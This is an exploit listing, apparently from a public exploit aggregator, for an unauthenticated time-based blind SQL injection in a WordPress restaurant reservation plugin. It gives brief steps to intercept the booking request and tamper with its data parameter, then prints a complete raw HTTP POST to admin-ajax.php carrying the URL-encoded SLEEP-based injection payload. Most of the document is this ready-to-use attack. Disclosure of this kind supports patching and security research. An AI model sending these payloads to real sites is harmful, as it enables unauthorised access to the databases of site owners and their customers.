## https://sploitus.com/exploit?id=WPEX-ID:E3C6D137-FF6E-432A-A21A-B36DC81F73C5
As unauthenticated, fill the reservation form (it's on a page where the [reservation_form] is embed), intercept the request and change the data parameter to something like ["5","11","11:11","13:11:00","2022-08-07","Name","Mail","2","phone","confirmed' AND (SELECT 7872 FROM (SELECT(SLEEP(5)))dkvk) AND 'X'='X"]
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 305
Connection: close
action=kechup_rr_bookings_interact&validation_key=680bed9c59&operation=create&data=%5b%225%22%2c%2211%22%2c%2211%3a11%22%2c%2213%3a11%3a00%22%2c%222022-08-07%22%2c%22Name%22%2c%22Mail%22%2c%222%22%2c%22phone%22%2c%22confirmed'%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(0)))dkvk)%20AND%20'X'%3d'X%22%5d